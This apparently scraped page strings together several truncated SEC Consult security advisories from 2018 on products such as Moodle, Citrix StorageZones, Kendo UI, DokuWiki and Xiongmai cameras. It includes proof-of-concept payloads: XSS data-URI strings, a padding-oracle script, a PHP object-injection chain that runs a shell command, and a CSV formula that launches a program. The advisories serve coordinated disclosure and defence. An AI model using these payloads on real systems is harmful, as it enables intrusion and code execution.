Vulnerability overview/description: --- Application overview: Miss Marple is an inventory software that consists of a client and a server part. The client (agent) is gathering system information and uploads the results to a remote server in an encrypted ZIP file. 1) Hardcoded AES key (CVE-2018-19233) A username and an encrypted password were identified in the Miss Marple Inventory Agent configuration file. By decompiling the binary, the encryption method was identified as AES-256 with a hardcoded key and initialization vector. The credentials are used to deploy the inventory files to a remote server. 2) Uploading arbitrary files There are two ways an attacker can upload arbitrary files to the server. 2.1) Patching the application binary to bypass the ZIP file extension check Using this method, it is possible to upload any file to the server, even if the credentials are unknown to the attacker! This works because every file in a specific directory gets uploaded, as long as the file has the correct file extension. This can be bypassed because the file extension is only checked on the client side and not on the server side. Patching the binary is done by replacing the extension string with the file extension of the attackers file eg. ".aspx" in the MMIA.exe binary itself. 2.2) Using cURL to upload arbitrary files If the credentials are known to the attacker, it is possible to use tools like cURL to upload arbitrary files to the remote server. Both ways can be used by an attacker to upload a web-shell to the server and execute arbitrary commands. 3) Missing update validation (CVE-2018-19234) Besides the Miss Marple Inventory Agent, an Miss Marple Updater Service is running on all clients. This service checks for new versions on the same server. If the files are uploaded to the right directory on the server, the updater will download and execute them with the highest privileges (NT Authority\SYSTEM) without validating the binaries. This can also be used for escalating privileges on the client. By uploading a web-shell using the methods described in vulnerability 2, an attacker gets sufficient write permissions to access the update directory and to place malicious files on the server. This will execute arbitrary code on all clients using Miss Marple. Proof of concept: - 1) Hardcoded AES key (CVE-2018-19233) No proof of concept will be provided. 2) Uploading arbitrary files 2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip" just has to be replaced with the file extension for the uploaded web-shell. 2.2) Using cURL to upload arbitrary files It is possible to upload arbitrary files using cURL and the credentials obtained in 1). 3) Missing update validation (CVE-2018-19234) No proof of concept will be provided. Vulnerable / tested versions: - The following versions have been tested and found to be vulnerable: Miss Marple Inventory Agent / Miss Marple Updater Service 1.13 Vendor contact timeline: 2018-06-
SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 > === title: Denial of Service product: Microsoft Skype for Business 2016 / Lync 2013 vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000 Skype for Business 2016: before v16.0.4756.1000 fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000 Skype for Business 2016 v16.0.4756.1000 CVE number: CVE-2018-8546 impact: Medium homepage: https://www.skype.com/en/business/ found: 08/2018 by: Sabine Degen (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software." Source: https://en.wikipedia.org/wiki/Skype_for_Business Business recommendation: Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately. Especially if Skype for Business is being used for external communication. Vulnerability overview/description: --- A large number of emojis (e.g. ~800 kittens) received in one message by the Skype For Business client freezes the program for a few seconds. This can be exploited to perform Denial of Service attacks against Skype for Business users and compromises the availability of the program. For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video. Note that the sound and video stream is handled by a separate thread and therefore are not affected (e.g. killed), only the functions related to graphical user interface become unusable. Proof of concept: - After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted. The following SIP packet illustrates the attack. MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0 Via: SIP/2.0/tls 127.0.0.1:7490 From: ;tag=82254700;epid=e67b0162bec8 To: ;tag=5c302cb624;epid=15347556e6 Max-Forwards: 70 CSeq: 12 MESSAGE User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0) Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x Route: Contact: Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA Content-Length: 4420 Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*" (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...] Vulnerable / tested versions: - The following versions have been identified as vulnerable which were the latest versions available at the time of the test: * Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013 * Skype for Business 2016 MSO (16.0.93).64-Bit, Both versions were running on Windows 10 Pro. According to the vendor, all previous versions are affected: * Skype for Business 2015 (Lync 2013) before v15.0.5075.1000 * Skype for Business 2016: before v16.0.4756.1000 Vendor contact timeline: 2018-08-02: Vulnerability details submitted to Microsoft, MSRC Case 47060 assigned 2018-08-28: Asking for a status update 2018-08-30: Vendor: issue has been reproduced, solution to block the user provided 2018-08-31: Follow-up questions why DoS is not categorized as security issue as the provided workaround is not effective for attacks already in progress 2018-08-31: Vendor: decided to f
SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)
SEC Consult also published a blog post regarding the identified security issues with further background information: Blog: https://r.sec-consult.com/xmeye SEC Consult Vulnerability Lab Security Advisory < 20181009-0 > === title: Remote Code Execution via XMeye P2P Cloud product: Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices vulnerable version: see below fixed version: - CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919 impact: Critical homepage: http://www.xiongmaitech.com/en/ found: 2018-03-05 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance, Video intelligent research and development. We devote ourselves to providing good products, technical services for manufacturers, wholesaler and service provider, in order to offer better experience for our customers. We are global leading providers in security video products and technology. Established from 2009, many years development, the headquarter of XM locate in Yinhu Innovation Center, Fuyang district, Hangzhou now. Total registered capital reach to 60 million. Now we owns nearly 2000 employees including a strong R team (more than 300 experienced engineers)." Source: http://www.xiongmaitech.com/en/index.php/about/company/18 Business recommendation: SEC Consult has identified highly critical vulnerabilities in Xiongmai products and the "XMeye P2P Cloud" feature which is being used in many 3rd party OEM devices as well. The vendor does not provide proper mitigations and hence it is recommended not to use any products associated with the XMeye P2P Cloud until all of the identified security issues have been fixed and a thorough security analysis has been performed by professionals. Vulnerability overview/description: --- 1) Predictable XMEye Cloud IDs (CVE-2018-17915) All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a proprietary, UDP-based protocol that allows users to access their IP cameras or NVRs/DVRs via the internet. The feature is enabled by default, no setup by the user is required. The device initiates and keeps a connection to a Xiongmai cloud server. All connections between clients and the devices are established via Xiongmai cloud servers. This approach allows users to connect to devices that are behind firewalls, NATed etc. The unique, per-device identifier is the cloud ID. It is a 16 character long hexadecimal string (e.g. f7e708f21de0fde0). Anyone who knows the device identifier and the admin credentials can establish a connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop application. The Cloud ID may be unique, but it is not random. It is derived (at boot time) from the device MAC address using a few simple operations (see get_sn_from_mac()) below. An attacker can enumerate potential MACs/cloud IDs and find valid ones. Then use the weak default credentials to log in. This allows the attacker to watch the video feed, change the device configuration and possibly gain remote code execution using other vulnerabilities. The XMEye functionality allows an attacker to attack devices that are behind firewalls, NATed networks etc. MAC addresses have a well defined structure: 3-octet OUI (Vendor) + 3-octet NIC ID OUIs are assigned by the IEEE. Interestingly Xiongmai does not own an OUI, but instead uses the OUIs of other companies. The following OUIs are used by Xiongmai devices (OUIs based on internet research, scanning, company names based on [1]): 001210 WideRay Corp 001211 Protechna Herbst GmbH & Co. KG 001212 PLUS Corporation 001213 Metrohm AG 001214 Koenig & Bauer AG 001215 iStor Networks, Inc. 001216 ICP Internet Communication Payment AG 001217 Cisco-Linksys, LLC 001218 ARUZE Corporation 003E0B - Not assigned We developed a cloud ID scanner that queries the Xiongmai cloud server. The responses indicate if there is a device online that uses the given cloud ID, plus provide the IP of a Xiongmai Cloud hop server that is geographically close to the device. One query is one UDP packet. We scanned 0.02% of the devices (random choice) in each OUI range (16 Million devices per range) and extrapolated the results. OUI: 001210; IDs checked 3,365; Devices online 3; Success rate: 0.1%; extrapolated devices online: 14,957 OUI: 001211; IDs checked 3,363; Devices online 9; Success rate:
SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 > === title: Password disclosure vulnerability & XSS product: PTC ThingWorx vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x fixed version: see Solution section CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218 impact: critical homepage: https://www.ptc.com found: 2018-03-13 by: M. Tomaselli (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ThingWorx is more than an IoT platform; it provides the functionality, flexibility and scalability that businesses need to drive industrial innovation─including the ability to source, contextualize and synthesize data while orchestrating processes and delivering powerful web, mobile and AR experiences." Source: https://www.ptc.com/en/thingworx8 Business recommendation: ThingWorx allows to configure Things to communicate with other services over several protocols (e.g. LDAP integration via a DirectoryServices Thing). In order to communicate with services that require authentification, ThingWorx provides functionality to associate credentials to a Thing. During a brief audit it was noticed that ThingWorx Composer leaks the following sensitive data: 1) The PBKDF2WithHmac512 password hash of a user Thing 2) The AES encrypted password of several Things containing password attributes Furthermore, the password used for encryption is hard-coded and thus identical along all installations. Besides the above mentioned vulnerabilities a reflected cross-site scripting vulnerability was identified in the ThingWorx SQUEAL search function. The vendor provides a patch which should be installed immediately. It is recommended to perform further thorough security audits as the product may be affected by other potential security vulnerabilities. Vulnerability overview/description: --- 1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216) ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application users when doing exports with an administrative account. This enables an attacker to conduct offline brute-force or dictionary attacks against the obtained password hashes. 2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords (CVE-2018-17217) A critical information disclosure vulnerability leaks the AES encrypted passwords of services configured within ThingWorx. Due to a hard-coded master password in the SecureData class, an attacker is able to decrypt the obtained passwords which grants him access to other services. The AES encrypted password gets disclosed in the server response when a user/attacker visits a Thing that contains credentials. 3) Reflected Cross-Site Scripting (CVE-2018-17218) The JavaScript part of the ThingWorx SQUEAL search functionality (searchExpression parameter) which is responsible for parsing the obtained JSON response fails to properly sanitize user supplied input. If the victim views attacker-prepared content (e.g. on a website or in an HTML email) an attacker is able to execute arbitrary actions in the context of its victims' sessions. Proof of concept: - The proof of concept has been removed from this advisory. Vulnerable / tested versions: - The vulnerabilities have been verified to exist in version 8.0.1-b39 which was the latest version available at the time of the test. The vendor provided further affected version information. See the Solution section for reference. Vendor contact timeline: 2018-03-14: Contacting vendor through email 2018-03-16: Advisory sent to vendor via encrypted mail 2018-03 - 2018-09: Multiple phone calls with PTC R department discussing release & multi-party disclosure 2018-08-15: Vendor provided private notifications to customers to give 45 days to upgrade 2018-10-01: Coordinated release of SEC Consult advisory Solution: - Best recommendation is to upgrade to the latest version of ThingWorx to version 8.3.2 (at time of writing). For newer verions, the issue of the hard coded password has been fixed and the SQUEAL function removed. The minimum upgrade to obtain mitigations for all 3 issues depends on the version of ThingWorx in use. For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+ For ThingWorx version 8.0.x, upgrade to 8.0.12+ For ThingWorx version 8.1.x, upgrade to 8.1.7+ For ThingWorx version 8.2.x, upgrade to 8.2.4+ The vendor always recommends upgradin
SEC Consult SA-20180926-0 ::
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 > === title: Stored Cross-Site Scripting product: Progress Kendo UI Editor vulnerable version: v2018.1.221 fixed version: none, see workaround CVE number: CVE-2018-14037 impact: medium homepage: https://www.progress.com/kendo-ui found: 2018-04-23 by: M. Tomaselli (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The Editor allows users to create rich text content by means of a WYSIWYG interface. This HTML5 widget outputs identical HTML across all major browsers, follows accessibility standards and provides an API for content manipulation. The generated widget value is comprised of XHTML markup." https://www.telerik.com/kendo-ui/editor Business recommendation: SEC Consult recommends to implement the workarounds provided by the vendor. Vulnerability overview/description: --- The demo application of the Kendo UI Editor which is hosted at https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function which should protect from cross site scripting. However, the implemented Sanitizer fails to catch certain payloads which allow an attacker to execute JavaScript in the context of the editor itself. Proof of concept: - The following, incomplete list, of payloads can be used to trigger an alert box in the API demo application of the Kendo UI Editor: https://demos.telerik.com/kendo-ui/editor/api After a click on the button the setValue function on line 513 of the beautified "api.js" is called: var setValue = function () { editor.value($("#value").val()); }; The value function is implemented in line 64383 of the beautified "kendo.all.js" file and defined as: value: function (html) { var body = this.body, editorNS = kendo.ui.editor, options = this.options, currentHtml = editorNS.Serializer.domToXhtml(body, options.serialization); if (html === undefined) { return currentHtml; } if (html == currentHtml) { return; } editorNS.Serializer.htmlToDom(html, body, options.deserialization); this.selectionRestorePoint = null; this.update(); this.toolbar.refreshTools(); }, In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom() function is called which can be seen in the excerpt below: var Serializer = { toEditableHtml: function (html) { return (html || '').replace(//g, '').replace(/<(\/?)script([^>]*)>/gi, '<$1k:script$2>').replace(/]*)>/gi, function (match) { return match.replace(onerrorRe, ''); }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, '$1').replace(/^<(table|blockquote)/i, br + '<$1').replace(/^[\s]*(|\u00a0)/i, '$1').replace(/<\/(table|blockquote)>$/i, '' + br); }, Although certain payloads are detected and sanitized by the function, the implemented protection fails to detect the data uri payload. The payload is added unescaped to the editor DOM after several other functions calls. Vulnerable / tested versions: - The following version has been identified to be vulnerable: * v2018.1.221 Vendor contact timeline: 2018-05-02: Contacting vendor through email for security contact 2018-05-02: Contact person requests to obtain advisory via unencrypted mail 2018-05-08: Advisory delivered through unencrypted email to vendor 2018-05-29: Contacting vendor for current status and informing them about the publishing date 2018-07-02: Reminded the vendor that the advisory will be published soon 2018-07-02: Multiple emails exchanged, vendor demands that customers need to issue a support ticket on this case 2018-07-03: Telling them that it is a security issue they already know two months without seemingly acting upon it. Vendor: product managers have been informed and will contact us; no further info 2018-07-11: Asking vendor again for a status update & patch information 2018-07-11: Vendor: "Thank you for following up. I have sent this to the product team to take into consideration. They will be following up with you as they may need. We appreciate you following up regarding this request." 2018-07-12: Detailed answer from vendor regarding workaround 2018-07-13: Requested CVE num
Re: SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
here with correct email subject :) On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20180926-0 > > === > title: Stored Cross-Site Scripting > product: Progress Kendo UI Editor > vulnerable version: v2018.1.221 > fixed version: none, see workaround > CVE number: CVE-2018-14037 > impact: medium >homepage: https://www.progress.com/kendo-ui > found: 2018-04-23 > by: M. Tomaselli (Office Munich) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "The Editor allows users to create rich text content by means of a WYSIWYG > interface. This HTML5 widget outputs identical HTML across all major browsers, > follows accessibility standards and provides an API for content manipulation. > The generated widget value is comprised of XHTML markup." > > https://www.telerik.com/kendo-ui/editor > > > Business recommendation: > > SEC Consult recommends to implement the workarounds provided by the vendor. > > > Vulnerability overview/description: > --- > The demo application of the Kendo UI Editor which is hosted at > https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function > which should protect from cross site scripting. However, the implemented > Sanitizer fails to catch certain payloads which allow an attacker to execute > JavaScript in the context of the editor itself. > > > Proof of concept: > - > The following, incomplete list, of payloads can be used to trigger an alert > box in the API demo application of the Kendo UI Editor: > https://demos.telerik.com/kendo-ui/editor/api > > > data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+"> > > HTTP-EQUIV="refresh" > CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> > > > > After a click on the button the setValue function on line 513 of the > beautified > "api.js" is called: > > var setValue = function () { > editor.value($("#value").val()); > }; > > > The value function is implemented in line 64383 of the beautified > "kendo.all.js" > file and defined as: > > value: function (html) { > var body = this.body, editorNS = kendo.ui.editor, options = > this.options, currentHtml = editorNS.Serializer.domToXhtml(body, > options.serialization); > if (html === undefined) { > return currentHtml; > } > if (html == currentHtml) { > return; > } > editorNS.Serializer.htmlToDom(html, body, > options.deserialization); > this.selectionRestorePoint = null; > this.update(); > this.toolbar.refreshTools(); > }, > > In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom() > function is called which can be seen in the excerpt below: > > var Serializer = { > toEditableHtml: function (html) { > return (html || '').replace(//g, > '').replace(/<(\/?)script([^>]*)>/gi, > '<$1k:script$2>').replace(/]*)>/gi, function (match) { > return match.replace(onerrorRe, ''); > }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, > '$1').replace(/^<(table|blockquote)/i, br + > '<$1').replace(/^[\s]*(|\u00a0)/i, > '$1').replace(/<\/(table|blockquote)>$/i, > '' + br); > }, > > Although certain payloads are detected and sanitized by the function, the > implemented protection fails to detect the data uri payload. The payload is > added unescaped to the editor DOM after several other functions calls. > > > Vulnerable / tested versions: > - > The following version has been identified to be vulnerable: > * v2018.1.221 > > > Vendor contact timeline: > > 2018-05-02: Contacting vendor through email for security contact > 2018-05-02: Contact person requests to obtain advisory via unencrypted mail > 2018-05-08: Advisory delivered through unencrypted email to vendor > 2018-05-29: Contacting vendor for curren
SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 > === title: Multiple Vulnerabilities product: Citrix StorageZones Controller vulnerable version: all versions before 5.4.2 fixed version: 5.4.2 CVE number: CVE-2018-16968, CVE-2018-16969 impact: Medium homepage: https://www.citrix.com/ found: 2018-08 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ShareFile is a file sharing service that enables users to easily and securely exchange documents. ShareFile Enterprise provides enterprise-class service and includes StorageZones Controller and the User Management Tool. ShareFile StorageZones Controller extends the ShareFile software as a service (SaaS) cloud storage by providing your ShareFile account with private data storage, referred to as StorageZones for ShareFile Data. [...]." URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html Business recommendation: Users of this product are advised to install the security patch provided by Citrix. The vulnerabilities identified suggest that no sufficient technical security audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult recommends Citrix to conduct such an audit. Vulnerability overview/description: --- The Citrix StorageZones Controller exposes resources that are typically only available to the internal network (e.g. CIFS Windows shares) to clients connecting from the Internet. In order to hide internal network paths from the user and in order to only allow access to paths specifically allowed by the administrator, internal network paths are encrypted. E.g. if an administrator wants to allow access to an UNC path (e.g. \\testhost\testshare\testdir) this string is encrypted and provided to the client. When the user calls the API to e.g. list the contents of this directory, the StorageZones Controller returns the encrypted absolute paths for each directory entry. This way, the absolute internal paths are always hidden from the user. 1) Improper Access Restrictions Citrix StorageZone Controller offers users a functionality to convert UNC paths into their encrypted form. Therefore, users are able to access any UNC paths accessible by the StorageZones Controller. When providing access to a network share, the StorageZones Controller impersonates the user. Therefore, unauthorized access to network shares is not possible. However, Citrix StorageZones Controller internally does not distinguish between UNC-paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows). Therefore, users may access (e.g. read, write, delete) local paths for which they have appropriate NTFS permissions. Note: Citrix StorageZones allows an administrator to define the paths exposed by the StorageZones Controller. By configuring this setting an administrator can restrict access to only network paths. The configuration page incorrectly states that a value of "*" (the default value) "allows connections to all hosts on the internal network", while in fact it also allows access to local paths. 2) Padding Oracle The encryption mechanism used by the Citrix StorageZones Controller is vulnerable to a padding oracle attack. This allows an attacker to partly decrypt or potentially modify internal paths. 3) Path Traversal The upload functionality is vulnerable to a path traversal attack if the preconditions to exploit the vulnerability #1 are met. In practice this vulnerability has a similar effect as vulnerability #1. Proof of concept: - 1) Improper Access Restrictions The following URL demonstrates how local paths can be encrypted: https:///cifs/v3/Items/ByPath?path=c:\ The following URL demonstrates how e.g. the contents of the directory can be listed: https:///cifs/v3/Items()?$expand=Children 2) Padding Oracle The following script demonstrates how encrypted internal paths can partly be decrypted. It may also be possible to partly modify encrypted paths (this has not been verified). snip import sys sys.path.append('python-paddingoracle') from paddingoracle import BadPaddingException, PaddingOracle, xor from base64 import b64encode, b64decode from urllib import quote, unquote import requests import socket import time import getpass URL = 'http:///' AUTH = (raw_input('User: '), getpass.getpass('Password: ')) CIPHER = '' class PadBuster(PaddingOracle): def __init__(self, **kwargs): super(PadBuster, self).__i
SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 > === title: Remote Code Execution via PHP unserialize product: Moodle - Open-source learning platform vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14 CVE number: CVE-2018-14630 impact: critical homepage: https://moodle.org/ found: 2018-07-08 by: Johannes Moritz (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Powering tens of thousands of learning environments globally, Moodle is trusted by institutions and organisations large and small, including Shell, London School of Economics, State University of New York, Microsoft and the Open University. Moodle’s worldwide numbers of more than 90 million users across both academic and enterprise level usage makes it the world’s most widely used learning platform." Source: https://moodle.org/about Business recommendation: The vendor provides a patch which should be installed immediately. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) Remote Code Execution via PHP unserialize (CVE-2018-14630) When importing a "drag and drop into text" (ddwtos) question in the legacy Moodle XML format, the passed feedback answer is used unsanitized in an unserialize() function, which leads to a PHP Object Injection vulnerability. By providing a sophisticated PHP Object chain it is possible to leverage the POI into a fully-blown arbitrary Remote Code Execution (RCE). To exploit this vulnerability an attacker needs permissions to create a quiz or at least be able to import questions. A user of the role teacher usually has these permissions. However, students can also be assigned to the role teacher for a specific course. Proof of concept: - 1) Remote Code Execution via PHP unserialize (CVE-2018-14630) In order to exploit this issue an attacker has to open Moodle's question bank for a specific course and import the following Moodle XML file. The answer feedback contains a sophisticated PHP object chain which only contains objects from Moodles library. After the parsing process the command "echo `whoami`" is being executed. question name O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2: {s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo `whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;} Vulnerable / tested versions: - The following version has been tested which was the most recent one at the time of the test: * 3.5.1+ According to the vendor, all previous versions are affected as well: * 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions Vendor contact timeline: 2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie from RIPS Technologies) 2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880] created) 2018-07-09: Vendor replied and supplied a fix for the vulnerability 2018-09-10: Vendor releases patched version 2018-09-18: Public release of security advisory Solution: - The vendor provides a patched version (3.5.2) which should be installed immediately: https://download.moodle.org/releases/latest/ The vendor also provided a security advisory regarding this issue: https://moodle.org/mod/forum/discuss.php?d=376023#p1516118 Workaround: --- Disable import of ddwtos questions through XML files. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | A
SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 > === title: CSV Formula Injection product: DokuWiki vulnerable version: 2018-04-22a "Greebo" and older versions fixed version: None CVE number: CVE-2018-15474 impact: Medium homepage: https://www.dokuwiki.org found: 2018-07-09 by: Jean-Benjamin Rousseau (Office Zurich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "DokuWiki is a simple to use and highly versatile Open Source wiki software that doesn't require a database. It is loved by users for its clean and readable syntax. The ease of maintenance, backup and integration makes it an administrator's favorite. Built in access controls and authentication connectors make DokuWiki especially useful in the enterprise context and the large number of plugins contributed by its vibrant community allow for a broad range of use cases beyond a traditional wiki." Source: https://www.dokuwiki.org/dokuwiki Business recommendation: The issue will not be fixed according to the vendor. Users are advised to be careful when opening files via the CSV export functionality. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) CSV Formula Injection vulnerability The administration panel of the application has a "CSV export of users" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that - when exported and opened with a spreadsheet application (Microsoft Excel, Open Office, etc.) - will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk. Exfiltration of sensitive data or even the execution of arbitrary code on the local machine of the victim will be the result. The final impact depends on the used spreadsheet software on the client of the victim. Proof of concept: - 1) CSV Formula Injection vulnerability Registration URL: http://www.example.com/doku.php?id=start=register When the registration request is submitted, the following parameters are sent in a POST request: sectok==register=1=login_parameter=evil_csv_formula_injection_payload=email_address The "fullname" parameter is not sanitized before being stored and during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example: =cmd|'/C calc'!A0 As soon as the file gets opened in Microsoft Excel, the program calc.exe is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source. Vulnerable / tested versions: - The latest version 2018-04-22a "Greebo" has been tested: https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz Also found to be vulnerable: 2017-02-19 stable release 2016-06-26 stable release 2015-08-10 stable release 2014-09-29 stable release 2014-05-05 stable release 2013-12-08 stable release Vendor contact timeline: 2018-07-18: Contacting vendor through a...@splitbrain.org 2018-07-18: Vendor replied, they asked for the advisory without encryption 2018-07-19: Advisory sent without encryption 2018-07-19: Vendor replied with no intention to fix the vulnerability 2018-07-30: Reminder sent to the vendor. No reply 2018-08-20: Ask for updates to the vendor 2018-08-20: Vendor replied that no patch will be provided 2018-09-06: Public release of security advisory Solution: - The issue will not be fixed according to the vendor: https://github.com/splitbrain/dokuwiki/issues/2450 Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive te
SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 > === title: SQL Injection, XSS & CSRF vulnerabilities product: Pimcore vulnerable version: 5.2.3 and below fixed version: 5.3.0 CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059 impact: High homepage: https://pimcore.com/en found: 2018-06-11 by: T. Silpavarangkura (Office Bangkok) N. Rai-Ngoen (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Pimcore is an award-winning consolidated open source enterprise platform for master data management (PIM/MDM), user experience management (CMS/UX), digital asset management (DAM) and eCommerce." Source: https://pimcore.com/en Business recommendation: The vendor provides a patch for most identified issues, but XSS will not be fixed according to the vendor. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1. SQL Injection (CVE-2018-14058) Multiple SQL injection vulnerabilities have been identified in the REST web service API. An attacker who obtains a valid API key that is granted a necessary permission could successfully perform an attack to extract information from the database. 2. Stored Cross-site Scripting (CVE-2018-14059) Multiple stored cross-site scripting vulnerabilities have been identified across multiple functions in the application, which allows an authenticated attacker to insert arbitrary JavaScript code in virtually all text fields and data entries in the application. 3. Cross-site Request Forgery (CVE-2018-14057) 